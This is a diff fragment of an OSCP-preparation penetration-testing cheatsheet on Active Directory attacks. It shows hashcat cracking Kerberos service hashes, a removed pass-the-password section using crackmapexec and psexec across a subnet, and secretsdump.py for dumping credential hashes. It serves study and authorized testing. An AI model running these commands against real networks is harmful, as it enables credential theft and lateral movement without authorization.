airadulescu/Pen-Test-Guidebook-Cheatsheet-OSCP-Preperation-/Active Directory.md

 [save hash and crack with hashcat] hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
 ```
-## Pass the Password Attack
-1. Lets say we have some credentials.
-Lets try to pass the password/hash to other connected networks.
-2. `crackmapexec 192.168.119.0/24 -u SOMEUSERNAME -d DOMAIN.LOCAL -p SOMEPASSWORD`
-3. `psexec DOMAIN/username:SOMEPASSWORD@TARGETIP ` to login if sucessful

 ## Dump the hash
 1. We have a user account and pssexed into an account.
 We want to dump hashes.
 2. `secretsdump.py Domain/USERNAME:SOMEPASSWORD@TargetIP`